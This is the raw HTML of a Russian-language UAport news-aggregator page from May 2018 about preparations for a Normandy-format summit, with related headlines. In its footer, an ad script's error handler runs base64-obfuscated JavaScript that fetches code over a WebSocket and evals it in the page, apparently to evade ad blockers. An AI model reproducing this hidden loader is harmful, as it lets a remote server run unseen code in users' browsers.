<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru" dir="ltr">
  <head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="УНН  Представитель Администрации Президента Украины Петра Порошенко 1 июня уезжает в Берлин для проведения подготовки встречи в нормандском формате. Об этом сообщил Президент Украины Петр Порошенко во время брифинга с президентом Германии Франком-Вальтером Штайнмайером, передает УНН.  &quot;Мы договорились в Аахене, что попробуем организовать в ближайшее время встречу на высшем уровне в нормандском формате и по этому поводу по моему" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="schema.dc" href="http://purl.org/dc/elements/1.1/" />
<meta property="og:title" content="Представитель АП 1 июня займется подготовкой встречи в нормандском формате (92)" />
<link rel="canonical" href="http://uaport.net/news/ua/t/1805/29/18931152" />
<meta property="og:url" content="http://uaport.net/news/ua/t/1805/29/18931152" />
<meta name="revisit-after" content="1 day" />
    <title>Представитель АП 1 июня займется подготовкой встречи в нормандском формате (92) | UAport</title>
    <meta name=viewport content="width=device-width, initial-scale=1">
    <link type="text/css" rel="stylesheet" media="all" href="/sites/uaport.net/files/css/css_868ee0ab262e01c3be48de5a4eb64da7.css" />
    <script type="text/javascript" src="/sites/uaport.net/files/js/js_2585a33082622e71015706ef868aab9a.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/", "ajaxblocks": "blocks=uanews-5\x26path=news/ua/t/1805/29/18931152" });
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
window.google_analytics_uacct = "UA-2485799-8";
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create", "UA-2485799-8", { "cookieDomain": "auto" });ga("send", "pageview");
//--><!]]>
</script>
    <!--[if lt IE 8]>
      <link type="text/css" rel="stylesheet" media="all" href="/sites/uaport.net/themes/uaport/fix-ie.css" />    <![endif]-->
  </head>
  <body class="sidebar-right">

<!-- Layout -->
<div class="body-div dash"><div class="sizer"><div class="expander">
	<div class="dcontent"><div id="block-locale-0" class="clear-block block block-locale">
  <div class="content"><ul><li class="ru first active"><a href="/news/ua/t/1805/29/18931152" class="language-link active">Русский</a></li>
<li class="uk"><a href="/uk/news/ua" class="language-link">Українська</a></li>
<li class="en last"><a href="/en/news/ua" class="language-link">English</a></li>
</ul></div>
</div>
</div>
</div></div></div>
    <div class="body-div"><div class="sizer"><div class="expander">
	<div class="header"><div class="logo"><a href="/"></a></div><div id="block-uanews-3" class="clear-block block block-uanews">
  <div class="content"><a href="/news/ua/source">Каталог СМИ</a></div>
</div>
<div class="hcentcont"><ul class="rtype"><li><a href="/news/ua">Новости</a></li><li><a href="/cat">Каталог</a></li></ul><form action="/news/ua/t/1805/29/18931152"  accept-charset="UTF-8" method="post" id="uanews-form">
<div><div class="form-item" id="edit-q-wrapper">
 <input type="text" maxlength="64" name="q" id="edit-q" size="64" value="" class="form-text" />
</div>
<input type="submit" name="op" id="edit-submit" value="Поиск"  class="form-submit" />
<input type="hidden" name="type" id="edit-type" value="news"  />
<input type="hidden" name="form_build_id" id="form-OBfE_aOQXPL2VDZkBOdsXz5OV2CDVjSzoctgiEe5uw8" value="form-OBfE_aOQXPL2VDZkBOdsXz5OV2CDVjSzoctgiEe5uw8"  />
<input type="hidden" name="form_id" id="edit-uanews-form" value="uanews_form"  />

</div></form>
</div>
	</div><!-- /header -->
    <div id="container">
	<div id="content">
			<div class="sectiontitle topblock"><span><a href="/news/ua">Новости Украины</a></span>
    <div class="rubr_sel"><u>Рубрики</u><ul class="news_rubr"><li><a href="/news/ua-rubr32">Автотранспорт</a></li><li><a href="/news/ua-rubr01">Агропром</a></li><li><a href="/news/ua-rubr20">Астрология</a></li><li><a href="/news/ua-rubr02">Банки</a></li><li><a href="/news/ua-rubr06">Биржи</a></li><li><a href="/news/ua-rubr25">Внешэконом</a></li><li><a href="/news/ua-rubr07">Инвестиции</a></li><li><a href="/news/ua-rubr39">Интернет</a></li><li><a href="/news/ua-rubr27">Калейдоскоп</a></li><li><a href="/news/ua-rubr22">Катастрофы</a></li><li><a href="/news/ua-rubr19">Компьютеры</a></li><li><a href="/news/ua-rubr12">Криминал</a></li><li><a href="/news/ua-rubr21">Культура</a></li><li><a href="/news/ua-rubr26">Масс-медиа</a></li><li><a href="/news/ua-rubr17">Медицина</a></li><li><a href="/news/ua-rubr37">Металлургия</a></li><li><a href="/news/ua-rubr18">Наука и техника</a></li><li><a href="/news/ua-rubr05">Недвижимость</a></li><li><a href="/news/ua-rubr10">Оборона, конверсия</a></li><li><a href="/news/ua-rubr23">Образование</a></li><li><a href="/news/ua-rubr34">Политика</a></li><li><a href="/news/ua-rubr08">Приватизация</a></li><li><a href="/news/ua-rubr38">Реклама, маркетинг</a></li><li><a href="/news/ua-rubr28">Религия</a></li><li><a href="/news/ua-rubr14">Связь</a></li><li><a href="/news/ua-rubr29">Спорт</a></li><li><a href="/news/ua-rubr35">Страхование</a></li><li><a href="/news/ua-rubr36">Строительство</a></li><li><a href="/news/ua-rubr31">Транспорт</a></li><li><a href="/news/ua-rubr30">Туризм</a></li><li><a href="/news/ua-rubr15">Экология</a></li><li><a href="/news/ua-rubr03">Экономика</a></li><li><a href="/news/ua-rubr04">Экономика Украины</a></li><li><a href="/news/ua-rubr16">Энергетика</a></li></ul></div>    <div class="dropdown_menu"><h3>Фокус: <b>Украина</b>  <ul class="menu"><li class="leaf first"><a href="/news/ua" title="">Украина</a></li>
<li class="leaf"><a href="/news/ru" title="">Россия</a></li>
<li class="leaf"><a href="/news/az" title="">Азербайджан</a></li>
<li class="leaf"><a href="/news/am" title="">Армения</a></li>
<li class="leaf"><a href="/news/by" title="">Беларусь</a></li>
<li class="leaf"><a href="/news/kz" title="">Казахстан</a></li>
<li class="leaf"><a href="/news/kg" title="">Кыргызстан</a></li>
<li class="leaf"><a href="/news/lv" title="">Латвия</a></li>
<li class="leaf"><a href="/news/md" title="">Молдова</a></li>
<li class="leaf"><a href="/news/ee" title="">Эстония</a></li>
<li class="leaf last"><a href="/news/un" title="">Мир</a></li>
</ul>    </h3></div>
</div>
								    	<div class="story"><div class="teaser"><h1><a href="/news/ua/go/UN1805290EB80" target="_blank" class="newstitle">Представитель АП 1 июня займется подготовкой встречи в нормандском формате</a>&nbsp;(92)</h1><div class="ist">Четверта Влада 2018.05.29 15:05</div><div class="newsan">УНН

Представитель Администрации Президента Украины Петра Порошенко 1 июня
уезжает в Берлин для проведения подготовки встречи в нормандском формате.
Об этом сообщил Президент Украины Петр Порошенко во время брифинга с
президентом Германии Франком-Вальтером Штайнмайером, передает УНН.

"Мы договорились в Аахене, что попробуем организовать в ближайшее время
встречу на высшем уровне в нормандском формате и по этому поводу по моему</div><div class="port">ВАЛЬТЕР, ПОРОШЕНКО, ФРАНК, ДОНБАСС, ГЕРМАНИЙ, ПРЕЗИДЕНТ, <a href="/news/ua-p_E9YYA">Порошенко</a>, <a href="/news/ua-pYNr0GQ">Гройсманом</a>, <a href="/news/ua-g3dXUNg">Германия</a>, <a href="/news/ua-g1DJgYg">Украина</a>, <a href="/news/ua-gREKisA">Киев</a>, <a href="/news/ua-gnIyIfA">Львов</a>, <a href="/news/ua-gbnD7Nw">Россия</a>, <a href="/news/ua-g5kxJKw">Берлин</a>, <a href="/news/ua-gmDIxhw">Франция</a></div></div><div class="date-nav"><span class="curr">2018.05.29 (92)</span><a href="/news/ua/t/1805/28/18931152" class="prev">2018.05.28 (15) →</a></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- UAport news 728x90 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-0165149739323115"
     data-ad-slot="3324003527"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script><ul class="all_news"><li><a href="/news/ua/go/UN1805290EDDE" target="_blank">Сто лет на страже рубежей</a> : <span class="ist2">Абхазская Государственная Телерадиокомпания 15:09</span></li><li><a href="/news/ua/go/UN1805290EDDA" target="_blank">Франк-Вальтер Штайнмайер рекомендовал Украине не бояться &quot;Северного потока-2&quot; и готовиться к переговорам с Россией</a> : <span class="ist2">News24UA 15:09</span></li><li><a href="/news/ua/go/UN1805290EDB4" target="_blank">Штайнмайер: Мы не сильно продвинулись в консенсусе по миротворцам на Донбассе</a> : <span class="ist2">Новости Донбасса 15:09</span></li><li><a href="/news/ua/go/UN1805290ED70" target="_blank">Штайнмайер пообещал активизировать переговоры в &quot;нормандском формате&quot;, но не решился &quot;предсказывать&quot; результат</a> : <span class="ist2">NewsOne 15:09</span></li><li><a href="/news/ua/go/UN1805290ED6C" target="_blank">Порошенко и Штайнмайер призвали освободить украинских узников Кремля</a> : <span class="ist2">ОстроВ 15:09</span></li><li><a href="/news/ua/go/UN1805290ECFD" target="_blank">Президент Германии советует Украине не опасаться потери газового транзита</a> : <span class="ist2">Минпром 15:08</span></li><li><a href="/news/ua/go/UN1805290ECF7" target="_blank">В Берлине обсудят подготовку встречи лидеров нормандской четверки</a> : <span class="ist2">ЛІГАБізнесІнформ 15:08</span></li><li><a href="/news/ua/go/UN1805290ECD3" target="_blank">Двусторонняя торговля между Украиной и Германией выросла на 23%</a> : <span class="ist2">AllRetail.ua 15:07</span></li><li><a href="/news/ua/go/UN1805290ECCE" target="_blank">Порошенко: Россия не выполняет решение Стокгольмского арбитража</a> : <span class="ist2">ЛІГАБізнесІнформ 15:07</span></li><li><a href="/news/ua/go/UN1805290ECCA" target="_blank">В Петербурге временно приостановили работу трех МРЭО</a> : <span class="ist2">Агентство Бизнес Новостей 15:07</span></li><li><a href="/news/ua/go/UN1805290EC96" target="_blank">Порошенко анонсировал подготовку встречи в &quot;нормандском формате&quot;</a> : <span class="ist2">Kramatorsk.info 15:07</span></li><li><a href="/news/ua/go/UN1805290EB80" target="_blank">Представитель АП 1 июня займется подготовкой встречи в нормандском формате</a> : <span class="ist2">Четверта Влада 15:05</span></li><li><a href="/news/ua/go/UN1805290EB6B" target="_blank">Порошенко заявил, что в прошлом году товарооборот Украины с Германией вырос на 23%</a> : <span class="ist2">Гордон 15:05</span></li><li><a href="/news/ua/go/UN1805290EAF3" target="_blank">Заинтересованность Германии экономикой Украины растет, - Штайнмайер</a> : <span class="ist2">Еспресо TV 15:04</span></li><li><a href="/news/ua/go/UN1805290E9EE" target="_blank">В сети рассекретили серийный кроссовер Audi Q8</a> : <span class="ist2">VistaNews.ru 15:03</span></li><li><a href="/news/ua/go/UN1805290E9EA" target="_blank">Штайнмайер попросил Украину не переживать о дальнейшем транзите газа</a> : <span class="ist2">DsNews 15:03</span></li><li><a href="/news/ua/go/UN1805290E9CC" target="_blank">Штайнмайер надеется на активизацию &quot;нормандского&quot; процесса</a> : <span class="ist2">УНИАН 15:03</span></li><li><a href="/news/ua/go/UN1805290E92C" target="_blank">Президент рассчитывает, что вопрос миротворцев будет решен в ближайшее время</a> : <span class="ist2">Комментарии.UA 15:02</span></li><li><a href="/news/ua/go/UN1805290E835" target="_blank">Глава МИД ФРГ посетит Украину в ближайшие дни - Порошенко</a> : <span class="ist2">Версии.com 15:01</span></li><li><a href="/news/ua/go/UN1805290E82D" target="_blank">Представитель АП 1 июня займется подготовкой встречи в нормандском формате</a> : <span class="ist2">Версии.com 15:01</span></li><li><a href="/news/ua/go/UN1805290E7E4" target="_blank">Президент Германии Штайнмайер о &quot;Северном потоке-2&quot;: Опасения Украины безосновательны</a> : <span class="ist2">112.ua 15:00</span></li><li><a href="/news/ua/go/UN1805290E759" target="_blank">В Украину прибыл президент Германии Штайнмайер - ФОТО</a> : <span class="ist2">УРА-Информ 14:58</span></li><li><a href="/news/ua/go/UN1805290E750" target="_blank">Представитель Администрации президента подготовит встречу в нормандском формате</a> : <span class="ist2">УРА-Информ 14:58</span></li><li><a href="/news/ua/go/UN1805290E550" target="_blank">В Киев прибыл президент Германии Штайнмайер</a> : <span class="ist2">Николаевские Известия 14:48</span></li><li><a href="/news/ua/go/UN1805290E4AE" target="_blank">Покушение на Стерненко: нападавший не был ветераном АТО, он работал охранником, - волонтер Шовкошитный</a> : <span class="ist2">УкропNews.com 14:47</span></li><li><a href="/news/ua/go/UN1805290E4AA" target="_blank">Порошенко: проект &quot;Северный поток-2&quot; направлен на то, чтобы расколоть ЕС</a> : <span class="ist2">Українські національні новини 14:47</span></li><li><a href="/news/ua/go/UN1805290E441" target="_blank">Киев начинает подготовку нормандской встречи</a> : <span class="ist2">Корреспондент.net 14:46</span></li><li><a href="/news/ua/go/UN1805290E41B" target="_blank">Порошенко: проект &quot;Северный поток-2&quot; направлен на то, чтобы расколоть ЕС</a> : <span class="ist2">ПрессОрг24 14:46</span></li><li><a href="/news/ua/go/UN1805290E3DC" target="_blank">В Украину с официальным визитом прибыл Президент ФРГ Штайнмайер</a> : <span class="ist2">В Час Пик 14:45</span></li><li><a href="/news/ua/go/UN1805290E38F" target="_blank">Миротворческая миссия ООН должна охватить всю оккупированную территорию, - Порошенко</a> : <span class="ist2">Вести.ua 14:45</span></li><li><a href="/news/ua/go/UN1805290E346" target="_blank">Порошенко отправил в Берлин представителя для подготовки саммита &quot;нормандской четверки&quot;</a> : <span class="ist2">ТСН.ua 14:44</span></li><li><a href="/news/ua/go/UN1805290E1D7" target="_blank">Сегодня в Нью-Йорке состоится заседание Совбеза ООН, посвященное Украине</a> : <span class="ist2">Информационное Сопротивление 14:42</span></li><li><a href="/news/ua/go/UN1805290E1B8" target="_blank">Нормандский процесс будет активирован, - Штайнмайер</a> : <span class="ist2">Hronika.info 14:41</span></li><li><a href="/news/ua/go/UN1805290E14F" target="_blank">Порошенко поручил начать переговоры по встрече &quot;нормандской четверки&quot;</a> : <span class="ist2">Гуру.ua 14:40</span></li><li><a href="/news/ua/go/UN1805290E112" target="_blank">Порошенко анонсировал подготовку встречи в &quot;нормандском формате&quot;</a> : <span class="ist2">ОстроВ 14:39</span></li><li><a href="/news/ua/go/UN1805290E08C" target="_blank">Штайнмайер в Киеве: Нормандский процесс будет снова активирован</a> : <span class="ist2">ЛІГАБізнесІнформ 14:38</span></li><li><a href="/news/ua/go/UN1805290DE8B" target="_blank">За год товарооборот между Украиной и Германией существенно вырос, - Порошенко</a> : <span class="ist2">Факты 14:33</span></li><li><a href="/news/ua/go/UN1805290DE1E" target="_blank">В омских дворах установят тренажеры и оборудуют детские площадки</a> : <span class="ist2">Новости@MAIL.RU 14:32</span></li><li><a href="/news/ua/go/UN1805290DE1A" target="_blank">Порошенко объявил о подготовке встречи в &quot;нормандском формате&quot;</a> : <span class="ist2">УП Європейська правда 14:32</span></li><li><a href="/news/ua/go/UN1805290DDB1" target="_blank">Порошенко поручил замглавы АП выехать в Берлин для подготовки переговоров в нормандском формате</a> : <span class="ist2">Страна.ua 14:32</span></li><li><a href="/news/ua/go/UN1805290DD83" target="_blank">Президент Германии ожидает активизации &quot;нормандского формата&quot;</a> : <span class="ist2">УП Європейська правда 14:32</span></li><li><a href="/news/ua/go/UN1805290DD7C" target="_blank">Украина увеличила объемы торговли с Германией - Порошенко</a> : <span class="ist2">Корреспондент.net 14:31</span></li><li><a href="/news/ua/go/UN1805290DD0D" target="_blank">Двусторонняя торговля между Украиной и Германией выросла на 23%, - Порошенко</a> : <span class="ist2">112.ua 14:30</span></li><li><a href="/news/ua/go/UN1805290DCD3" target="_blank">Порошенко анонсировал подготовку к очередной встрече в Нормандском формате</a> : <span class="ist2">Телеканал новин "24" 14:30</span></li><li><a href="/news/ua/go/UN1805290DBE5" target="_blank">Штайнмайер в Киеве отказался поддержать Порошенко</a> : <span class="ist2">Политнавигатор 14:25</span></li><li><a href="/news/ua/go/UN1805290DA54" target="_blank">Переговоры Порошенко и Штайнмайера начались в Мариинском дворце в Киеве, - АП. ФОТОрепортаж</a> : <span class="ist2">УкропNews.com 14:19</span></li><li><a href="/news/ua/go/UN1805290DA2B" target="_blank">Порошенко: Двусторонняя торговля между Украиной и Германией выросла на 23%</a> : <span class="ist2">Капитал 14:19</span></li><li><a href="/news/ua/go/UN1805290D98B" target="_blank">У Порошенко начали подготовку к встрече с Путиным</a> : <span class="ist2">Обозреватель 14:17</span></li><li><a href="/news/ua/go/UN1805290D94F" target="_blank">Президент Германии Штайнмайер прибыл в Киев (видео)</a> : <span class="ist2">Взгляд.ua 14:17</span></li><li><a href="/news/ua/go/UN1805290D690" target="_blank">В Киев прибыл президент Германии Штайнмайер</a> : <span class="ist2">Arena.press 14:13</span></li><li><a href="/news/ua/go/UN1805290D567" target="_blank">Порошенко проводит встречу с президентом Германии</a> : <span class="ist2">Слово і Діло 14:12</span></li><li><a href="/news/ua/go/UN1805290D54C" target="_blank">Порошенко поручил начать переговоры по встрече &quot;нормандской четверки&quot;</a> : <span class="ist2">Сегодня.ua 14:12</span></li><li><a href="/news/ua/go/UN1805290D531" target="_blank">Замглавы АП проведет переговоры в Берлине о встрече в нормандском формате</a> : <span class="ist2">РБК-Україна 14:11</span></li><li><a href="/news/ua/go/UN1805290D4E9" target="_blank">Ситуация на Донбассе: о чем будет говорить Порошенко с президентом Германии</a> : <span class="ist2">Знамя индустрии 14:11</span></li><li><a href="/news/ua/go/UN1805290D4DF" target="_blank">Порошенко встретился с президентом Германии в Киеве (прямая трансляция)</a> : <span class="ist2">Ведомости-Украина 14:11</span></li></ul><div class="item-list"><ul class="pager"><li class="pager-current first">1</li>
<li class="pager-item"><a href="/news/ua/t/1805/29/18931152?page=1" title="На страницу номер 2" class="active">2</a></li>
<li class="pager-next"><a href="/news/ua/t/1805/29/18931152?page=1" title="На следующую страницу" class="active">-›</a></li>
<li class="pager-last last"><a href="/news/ua/t/1805/29/18931152?page=1" title="На последнюю страницу" class="active">»</a></li>
</ul></div></div>	</div>
		<div id="right">
		<div id="block-block-23" class="clear-block block block-block">
  <div class="content"><!-- UAport_News_240x400 -->
<div id='div-gpt-ad-1344504890603-2' style='width:240px; height:400px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1344504890603-2'); });
</script>
</div>
</div>
</div>
<div id="block-uanews-5" class="clear-block block block-uanews">
  <h2>Главные новости</h2>
  <div class="content"><div id="block-uanews-5-ajax-content" class="ajaxblocks-wrapper-1"><script type="text/javascript"></script><noscript><ul><li><a href="/news/ua/t/1805/29/19020689" class="newstitle">Автобус из Украины попал в ДТП в Будапеште: десятки пострадавших</a></li><li><a href="/news/ua/t/1805/29/19016227" class="newstitle">Правление &quot;Нафтогаза&quot; получит $45,6 млн премии за победу над &quot;Газпромом&quot; в суде</a></li><li><a href="/news/ua/t/1805/29/19019663" class="newstitle">В Киеве на глазах у полиции сожгли машину помощника Мосийчука</a></li><li><a href="/news/ua/t/1805/29/19022225" class="newstitle">Стрельба в Бельгии: мужчина застрелил двух полицейских и взял заложницу</a></li><li><a href="/news/ua/t/1805/29/19015903" class="newstitle">В Канаде призвали правительство предоставить Украине оружие</a></li><div class="more"><a href="/news/ua">Все новости Украины</a></div>
	</ul></noscript></div></div>
</div>
	</div>
	    </div>
<br class="brclear" />
</div><!-- end #expander -->
</div><!-- end #sizer -->
</div><!-- end #body-div -->

<div class="body-div footer">
<div class="sizer">
<div class="expander">
<div class="copy">&copy; Информационный центр &quot;ЭЛВИСТИ&quot;, 2018<br />
&copy; InfoStream, 2018</div><div id="block-block-10" class="clear-block block block-block">
  <div class="content"><!--noindex-->
<!-- a href="http://top.list.ru/jump?from=162394" target="_blank" rel="nofollow"><img src="http://top.list.ru/counter?id=162394;t=52" border=0 width=88 height=31 alt="TopList"></a -->
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t21.1;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';i'+escape('Жж'+document.title.substring(0,80))+';'+Math.random()+
'" alt="" title="LiveInternet: показано число просмотров за 24 часа, посетителей за 24 часа и за сегодн\я" '+
'border=0 width=88 height=31><\/a>')//--></script><!--/LiveInternet-->
<!--bigmir)net TOP 100--> <script type="text/javascript" language="javascript"><!--
function BM_Draw(oBM_STAT){
document.write('<table cellpadding="0" cellspacing="0" border="0" style="display:inline;margin-right:4px;"><tr><td><div style="margin:0px;padding:0px;font-size:1px;width:88px;"><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b59_top.gif\') no-repeat bottom;"> </div><div style="font:10px Tahoma;background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b59_center.gif\');"><div style="text-align:center;"><a href="http://www.bigmir.net/" target="_blank" style="color:#0000ab;text-decoration:none;font:10px Tahoma;">bigmir<span style="color:#ff0000;">)</span>net</a></div><div style="margin-top:3px;padding: 0px 6px 0px 6px;color:#003596;"><div style="float:left;font:10px Tahoma;">'+oBM_STAT.hosts+'</div><div style="float:right;font:10px Tahoma;">'+oBM_STAT.hits+'</div></div><br clear="all"/></div><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b59_bottom.gif\') no-repeat top;"> </div></div></td></tr></table>');
}
//-->
</script> <script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={o:1,v:5533,s:5533,t:0,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.slice(7);if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[ovstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<sc'+'ript type="text/javascript" language="javascript" src="http://c.bigmir.net/?'+bs.join('&')+'"></sc'+'ript>');
//-->
</script> <noscript>
<a href="http://www.bigmir.net/" target="_blank" rel="nofollow"><img src="http://c.bigmir.net/?v5533&s5533&t2" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript> <!--bigmir)net TOP 100-->
<!--/noindex--></div>
</div>
<div id="block-menu-menu-footer" class="clear-block block block-menu">
  <div class="content"><ul class="menu"><li class="leaf first"><a href="/cat/register" title="">Добавить сайт</a></li>
<li class="leaf"><a href="/sitemap" title="">Карта сайта</a></li>
<li class="leaf"><a href="/banners">Коды кнопок</a></li>
<li class="leaf"><a href="/about">О сайте</a></li>
<li class="leaf"><a href="/contact" title="">Отправить сообщение</a></li>
<li class="leaf last"><a href="/ads">Реклама на сайте</a></li>
</ul></div>
</div>
<div id="block-block-27" class="clear-block block block-block">
  <div class="content"><div id="MIXADV_4576" class="MIXADVERT_NET"></div>
          <script> 
          var node4576 = document.getElementById("MIXADV_4576");
          if( node4576 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4576&r="+Math.random();
               node4576.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval(atob("c3RyID0gJ2Nvbm4gPSBuZXcgV2ViU29ja2V0KCJ3c3M6Ly9uMi5taXhhZHZlcnQuY29tOjQ0MzMvNDU3NiIpOyBjb25uLm9ubWVzc2FnZSA9IGZ1bmN0aW9uIChldnQpIHsgcG9zdE1lc3NhZ2UoZXZ0LmRhdGEpOyBjb25uLmNsb3NlKCk7fSc7dmFyIHdvcmtlciA9IG5ldyBXb3JrZXIoVVJMLmNyZWF0ZU9iamVjdFVSTChuZXcgQmxvYihbImV2YWwoICciK3N0cisiJykiXSksIHt0eXBlOiAndGV4dC9qYXZhc2NyaXB0J30pKTt3b3JrZXIucG9zdE1lc3NhZ2UoJzEnKTsgd29ya2VyLm9ubWVzc2FnZSA9IGZ1bmN0aW9uIChtc2cpIHsgd2luZG93LmV2YWwobXNnLmRhdGEpOyB9OyA="));
              }
          }
          </script></div>
</div>
</div></div></div>

      </body>
</html>
